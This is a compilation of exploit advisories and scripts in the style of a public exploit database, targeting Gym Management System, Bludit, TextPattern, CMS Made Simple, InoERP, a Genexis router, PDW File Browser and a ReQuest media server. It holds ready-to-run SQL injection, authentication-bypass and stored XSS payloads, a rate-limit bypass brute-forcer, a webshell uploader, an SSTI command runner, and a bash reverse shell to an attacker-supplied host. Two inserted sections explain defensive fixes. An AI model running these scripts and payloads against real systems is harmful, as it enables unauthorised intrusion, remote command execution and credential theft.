# Exploit Title: Gym Management System 1.0 - 'id' SQL Injection
# Date: 22/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#parameter Vulnerable: id
# Injected Request

GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/gym/gym/index.php?page=users
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re


//Comment
The above request prints the database name and MariaDB version.
            
# Exploit Title: Gym Management System 1.0 - Authentication Bypass
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/gym/gym/login.php

Step 2: Use the payload jyot' or 1=1# in the Username and Password fields

Malicious Request

POST /gym/gym/ajax.php?action=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/gym/gym/login.php
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23

Step 3: You will be logged in as admin.
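
Added example (not part of the original advisories or the application's code): the two Gym Management System requests above, the UNION-based 'id' injection and the "or 1=1" login bypass, both depend on request data being concatenated into the SQL text. The Python sketch below reproduces that pattern next to the bound-parameter form that defeats both, using a constructed in-memory SQLite table in place of the application's MariaDB schema; the table layout, function names and SQLite spellings of the payloads are assumptions.

```python
import sqlite3

# SQLite spellings of the two payloads above: "-- " replaces MySQL's "#"
# comment and sqlite_version() replaces GROUP_CONCAT(database(),version()).
LOGIN_PAYLOAD = "jyot' or 1=1-- "
ID_PAYLOAD = "-1 UNION ALL SELECT NULL,sqlite_version(),NULL,NULL,NULL--"


def make_db():
    """Constructed five-column users table (the UNION above selects five columns)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, "
               "username TEXT, password TEXT, type INTEGER)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, "Administrator", "admin", "constructed-secret-1", 1),
        (2, "Front Desk", "staff", "constructed-secret-2", 2),
    ])
    return db


def login_vulnerable(db, username, password):
    # Request data becomes part of the SQL text: a quote in the input ends the
    # string literal and everything after it is parsed as SQL.
    sql = ("SELECT id, username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def login_fixed(db, username, password):
    # Placeholders keep the input as data, whatever characters it contains.
    # (A real login would compare a password hash, not the stored value.)
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def get_user_vulnerable(db, raw_id):
    # Numeric context: no quote is needed to break out, so quoting-based
    # escaping would not help here either.
    return db.execute("SELECT * FROM users WHERE id = " + raw_id).fetchall()


def get_user_fixed(db, raw_id):
    # Validate the type first, then bind the value.
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    if user_id <= 0:
        return []
    return db.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login :", login_vulnerable(db, LOGIN_PAYLOAD, LOGIN_PAYLOAD))
    print("fixed login      :", login_fixed(db, LOGIN_PAYLOAD, LOGIN_PAYLOAD))
    print("vulnerable lookup:", get_user_vulnerable(db, ID_PAYLOAD))
    print("fixed lookup     :", get_user_fixed(db, ID_PAYLOAD))
```

In PHP/MySQLi the same fix is a prepared statement with bound parameters instead of interpolating $_GET or $_POST values into the query string.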
            
# Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection
# Date: 22/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#parameter Vulnerable: id
# Injected Request

GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

//Comment
The above request prints the database name and MariaDB version.
            
#!/usr/bin/python3

# Exploit
## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass
## Author: ColdFusionX (Mayank Deshmukh)
## Author website: https://coldfusionx.github.io
## Date: 2020-10-19
## Vendor Homepage: https://www.bludit.com/
## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
## Version: <= 3.9.2

# Vulnerability
## Discoverer: Rastating
## Discoverer website: https://rastating.github.io/
## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240
## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
## Patch: https://github.com/bludit/bludit/pull/1090

'''
Example Usage:
- ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt 
'''

import requests
import sys
import re
import argparse, textwrap
from pwn import *

#Expected Arguments
parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, 
epilog=textwrap.dedent(''' 
Exploit Usage : 
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt'''))                     

parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)") 
parser.add_argument("-u","--userlist", help="Username Dictionary") 
parser.add_argument("-p","--passlist", help="Password Dictionary")    
args = parser.parse_args()

if len(sys.argv) < 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")          
    sys.exit(1)  

# Variable
LoginPage = args.url
Username_list = args.userlist
Password_list = args.passlist

log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ')

def login(Username,Password):
    session = requests.session()          
    r = session.get(LoginPage)
 
# Progress Check    
    process = log.progress('Brute Force')

#Getting CSRF token value
    CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text)
    CSRF = CSRF.group(1)

#Specifying Headers Value
    headerscontent = {
    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    'Referer' : f"{LoginPage}",
    'X-Forwarded-For' : f"{Password}"
    }

#POST REQ data
    postreqcontent = {
    'tokenCSRF' : f"{CSRF}",
    'username' : f"{Username}",
    'password' : f"{Password}"
    }

#Sending POST REQ
    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)

#Printing Username:Password            
    process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            

#Conditional loops    
    if 'Location' in r.headers:
        if "/admin/dashboard" in r.headers['Location']:
            print()
            log.info(f'SUCCESS !!')
            log.success(f"Use Credential -> {Username}:{Password}")
            sys.exit(0)
    elif "has been blocked" in r.text:
        log.failure(f"{Password} - Word BLOCKED")
        
#Reading User.txt & Pass.txt files
userfile = open(Username_list).readlines()
for Username in userfile:
    Username = Username.strip() 
   
passfile = open(Password_list).readlines()
for Password in passfile:
    Password = Password.strip()   
    login(Username,Password)
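
Added example (not from the script's author or the Bludit project): the script above sends a different X-Forwarded-For value with every attempt, which only helps when the server keys its failed-login counter on that client-supplied header. The sketch below replays that request pattern against a constructed throttle, once keyed on the raw header and once keyed on an address that honours the header only when the TCP peer is a known reverse proxy; the proxy address, thresholds and function names are assumptions.

```python
import ipaddress
import time

# Constructed deployment detail: the only reverse proxy allowed to set the header.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def naive_ip(peer_addr, headers):
    """Pattern the script relies on: the client-supplied header wins."""
    return headers.get("X-Forwarded-For") or peer_addr


def client_ip(peer_addr, headers, trusted=TRUSTED_PROXIES):
    """Address to key the throttle on.

    X-Forwarded-For is read only when the TCP peer is a trusted proxy, and then
    from right to left, stopping at the first hop that is not a trusted proxy.
    """
    peer = ipaddress.ip_address(peer_addr)
    if peer not in trusted:
        return str(peer)
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed([h for h in hops if h]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)          # not an IP at all: ignore the header
        if addr not in trusted:
            return str(addr)
    return str(peer)


class LoginThrottle:
    """Sliding-window failed-login counter per key (constructed thresholds)."""

    def __init__(self, max_failures=10, window=300.0, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.clock = clock
        self._failures = {}

    def is_blocked(self, key):
        now = self.clock()
        recent = [t for t in self._failures.get(key, []) if now - t < self.window]
        self._failures[key] = recent
        return len(recent) >= self.max_failures

    def record_failure(self, key):
        self._failures.setdefault(key, []).append(self.clock())


def attempts_before_block(key_fn, words, peer="203.0.113.7"):
    """Replay failed logins shaped like the script's requests: one TCP peer,
    a different X-Forwarded-For value per attempt. Returns how many attempts
    reached the password check."""
    throttle = LoginThrottle()
    checked = 0
    for word in words:
        key = key_fn(peer, {"X-Forwarded-For": word})
        if throttle.is_blocked(key):
            continue
        checked += 1
        throttle.record_failure(key)
    return checked


if __name__ == "__main__":
    words = [f"word{i}" for i in range(50)]   # constructed candidate list
    print("keyed on raw header  :", attempts_before_block(naive_ip, words))
    print("keyed on trusted peer:", attempts_before_block(client_ip, words))
```

An X-Forwarded-For value that does not parse as an IP address, as in the requests the script generates, is also a useful signal to log on the login endpoint.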
            
# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages

Step 2: Use the payload <script>alert(document.cookie)</script> in the Package Name and Description fields

Malicious Request
POST /gym/gym/ajax.php?action=save_package HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710
Content-Length: 587
Origin: http://localhost
Connection: close
Referer: http://localhost/gym/gym/index.php?page=packages
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="id"


-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="package"

<script>alert(document.cookie)</script>
-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="description"

<script>alert(document.cookie)</script>
-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="amount"

1
-----------------------------10391575234966392972740129710--

Step 3: Cookie will be reflected each time someone visits the Packages section.
            
#!/usr/bin/python3

# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
# Google Dork: N/A
# Date: 16/10/2020
# Exploit Author: Michele '0blio_' Cisternino
# Vendor Homepage: https://textpattern.com/
# Software Link: https://github.com/textpattern/textpattern
# Version: <= 4.8.3
# Tested on: Kali Linux x64
# CVE: N/A

import sys
import json
import requests
from bs4 import BeautifulSoup as bs4
from time import sleep
import random
import string
import readline

# Disable SSL warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Simple Terminal User Interface class I wrote to print run-time logs and headers
class Tui ():
    def __init__ (self):
        self.red = '\033[91m'
        self.green = '\033[92m'
        self.blue = '\033[94m'
        self.yellow = '\033[93m'
        self.pink = '\033[95m'
        self.end = '\033[0m'
        self.bold = '\033[1m'

    def header (self, software, author, cve='N/A'):
        print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
        print ("{}CVE:{} {}".format(self.pink, self.end, cve))
        print ("{}Author:{} {}\n".format(self.pink, self.end, author))

    def info (self, message):
        print ("[{}*{}] {}".format(self.blue, self.end, message))

    def greatInfo (self, message):
        print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))

    def success (self, message):
        print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))

    def warning (self, message):
        print ("[{}!{}] {}".format(self.yellow, self.end, message))

    def error (self, message):
        print ("[{}✗{}] {}".format(self.red, self.end, message))

log = Tui()
log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")

if len(sys.argv) < 4:
    log.info ("USAGE: python3 exploit.py http://target.com username password")
    log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
    sys.exit()

# Get input from the command line
target, username, password = sys.argv[1:4]

# Fixing URL
target = target.strip()
if not target.startswith("https://") and not target.startswith("http://"):
    target = "http://" + target
if not target.endswith("/"):
    target = target + "/"

accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}

# Login
log.info ("Authenticating to the target as '{}'".format(username))
s = requests.Session()
try:
    r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
    sleep(1)
    if r.status_code == 200:
        log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
        sleep(1)

        # Parsing the response to find the upload token inside the main json array
        log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
        soup = bs4(r.text, 'html.parser')
        scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
        scriptJS = json.loads(scriptJS)
        uploadToken = scriptJS['_txp_token']
        log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))

    # The server reply with a 401 with the user provide wrong creds as input
    elif r.status_code == 401:
        log.error ("Unable to login. You provided wrong credentials..\n")
        sys.exit()
except requests.exceptions.ConnectionError:
    log.error ("Unable to connect to the target!")
    sys.exit()

# Crafting the upload request here
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
    "Accept-Encoding" : "gzip, deflate",
    "X-Requested-With" : "XMLHttpRequest",
    "Connection" : "close",
}

# Generating random webshell name
randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'

# Mapping multiparts here
multipart_form_data = {
    "fileInputOrder" : (None, '1/1'),
    "app_mode" : (None, 'async'),
    "MAX_FILE_SIZE" : (None, '2000000'),
    "event" : (None, 'file'),
    "step" : (None, 'file_insert'),
    "id" : (None, ' '),
    "_txp_token" : (None, uploadToken), # Token here
    "thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol
}

# Uploading the webshell
log.warning ("Sending payload..")

try:
    r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
    if "Files uploaded" in r.text:
        log.success ("Webshell uploaded successfully as {}".format(randomFilename))
except:
    log.error ("Unexpected error..")
    sys.exit()

sleep(2)

# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
log.greatInfo ("Interacting with the HTTP webshell..")
sleep (1)
print()

while 1:
    try:
        cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
        if cmd == 'exit':
            raise KeyboardInterrupt
        r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
        print (r.text)
    except KeyboardInterrupt:
        log.warning ("Stopped.")
        exit()
    except:
        log.error ("Unexpected error..")
        sys.exit()

print()
            
# Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
# Google Dork: N/A
# Date: 11/10/2017
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: N/A
# Version: 2.1.6
# Tested on: Linux
# CVE : CVE-2017-16783
# POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/


from argparse import ArgumentParser, RawTextHelpFormatter
from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus
import requests as http
import re
from bs4 import BeautifulSoup, Tag
from huepy import *
parser = ArgumentParser(description="Exploit for CVE-2017-16783",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument(
    "--target",
    "-t",
    help="complete remote target with protocol, host, path and query",
    required=True,
    dest="t")
parser.add_argument("--command",
                    "-c",
                    help="command to execute (default: whoami)",
                    default="whoami",
                    dest="c")
args = parser.parse_args()

print(info("Building malicious url"))
url = urlparse(args.t)
query = parse_qs(url.query)
query["cntnt01detailtemplate"] = [
    "string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c
]
query = {k: ",".join(v) for k, v in query.items()}
query = unquote_plus(urlencode(query, doseq=False))
_url = url.scheme + "://" + url.netloc + url.path + "?" + query
print(good("Done"))
print(info("Executing payload"))
r = http.get(_url)
html = BeautifulSoup(r.content.decode(), "html5lib")
main: Tag = html.find("article", {"id": "main"})
main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip()
print(good("Done"))
print(info("Result"))
print(main)
            
# Exploit Title: Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/24
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/healthcare_0.zip
# Version: 1.0
# Tested on: XAMPP 
# CVE : N/A

Vulnerable Pages:
http://localhost/healthcare/Users/registration.php
http://localhost/healthcare/Doctor/doctor_registration.php

Proof of Concept:

1 - Go to vulnerable pages and fill the "First Name" and "Last Name" blanks with <script>alert(1)</script> payload.

2 - Then check the user/doctor account in the admin panel or at the http://localhost/healthcare/admin/user_detail.php?id=<userid> address.
            
# Exploit Title: Persistent XSS in SSID
# Date: 10/24/2020
# Exploit Author: Amal Mohandas
# Vendor Homepage: https://genexis.co.in/product/ont/
# Version: Platinum-4410 Software version - P4410-V2-1.28
# Tested on: Windows 10

Vulnerability Details
======================
Genexis Platinum-4410 Home Gateway Router is vulnerable to stored XSS
in the SSID parameter. This could allow attackers to perform malicious
actions, with the XSS popup affecting all privileged users.

How to reproduce
===================
1. Login to the firmware as any user
2. Navigate to Net tab--> WLAN
3. Enter below mentioned payload in "SSID" text box
<script>alert(1)</script>
4. Click on the "OK" button.
5. Relogin as any user and again navigate to Net tab--> WLAN
6. Observe the XSS popup showing persistent XSS
            
#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: InoERP 0.7.2  Unauthenticated Remote Code Execution
# Date: March 14, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/03/14/inoerp-ab-rce/
# Software Link: https://github.com/inoerp/inoERP
# Version: 0.7.2 
# Tested on: Ubuntu 19

import requests
import os
import sys

if len (sys.argv) != 4:
	print ("specify params in format: python inoerp.py target_url attacker_ip listening_port")
else:
        target_url = sys.argv[1]
	attacker_ip = sys.argv[2]
	listening_port = sys.argv[3]
	target_url += "/modules/sys/form_personalization/json_fp.php"
	target_headers = {"Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest"}
	code = "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'\");".format(attacker_ip, listening_port)
	expl_data = {"get_fp_from_form": "true", "template_code": code, "obj_class_name": ''}

	requests.post(target_url, headers=target_headers, data=expl_data)
	print ("Check your listener.")
            
# Exploit Title: PDW File Browser <= v1.3 - Cross-Site Scripting (XSS)
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3

The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a stored and Reflected XSS vulnerability which results in code execution within the browser of an authenticated user. This vulnerability can be exploited when an authenticated user visits the crafted URL (i.e. when phished or when visiting a website containing the URL).

Stored XSS:
The stored XSS is a result of insufficient input sanitization within the 'rename' functionality within the PDW file browser. 
Below I have provided an example request where the filename (FILE.txt) is replaced with an XSS payload (<svg onload=alert(document.cookies)>). The payload gets executed when any authenticated user navigates to the PDW File browser page.

POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
Host: <HOSTNAME>
[…]
action=rename&new_filename=<svg+onload=alert(document.cookies)>&old_filename=script%253EFILE.txt&folder=%252Fmedia%252F&type=file

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existing file (the XSS payload). This results in the execution of the payload.

https://<HOSTNAME>/ckeditor/plugins/pdw_file_browser/file_specs.php?ajax=true&path=%3Csvg+onload=alert(document.cookies)%3E&type=file



Happy Hacking :^)
            
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0

ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
                  7.0.2.4954
                  6.5.2.4954
                  6.4.2.4681
                  6.3.2.4203
                  2.0.1.823

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The unprotected web management server is vulnerable to sensitive information
disclosure. An unauthenticated attacker can visit the message_log
page and disclose the webserver's Python debug log file containing system information,
credentials, paths, processes and command arguments running on the device.

Tested on: ReQuest Serious Play® OS v7.0.1
           ReQuest Serious Play® OS v6.0.0
           Debian GNU/Linux 5.0
           Linux 3.2.0-4-686-pae
           Linux 2.6.36-request+lenny.5
           Apache/2.2.22
           Apache/2.2.9
           PHP/5.4.45
           PHP/5.2.6-1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2020-5600
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php


01.08.2020

--


$ curl http://192.168.1.17/message_log

...
...
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1590039696]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1581646992]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000002/.request/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1403303056]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000003/.request/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1610613904]: (mediaman.py/11576) Message Response (mrespgetdir): /fat32/c/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1619006608]: (mediaman.py/11576) Message Response (mrespgetdir): Failed - no such directory
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1285805200]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
Oct 14 09:17:36 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
Oct 14 09:17:48 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
Oct 14 09:19:19 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
Oct 14 09:19:32 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.397037 ('Update News Feed'): /home/arq/bin/widget/news_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.401558 ('Update Stock Feed'): /home/arq/bin/widget/stock_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/181) Skipping a command ('Check if squeezeplay was properly started'); condition doesn't match
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.408094 ('Probe for CP2101'): /home/arq/bin/cp2101_probe.sh
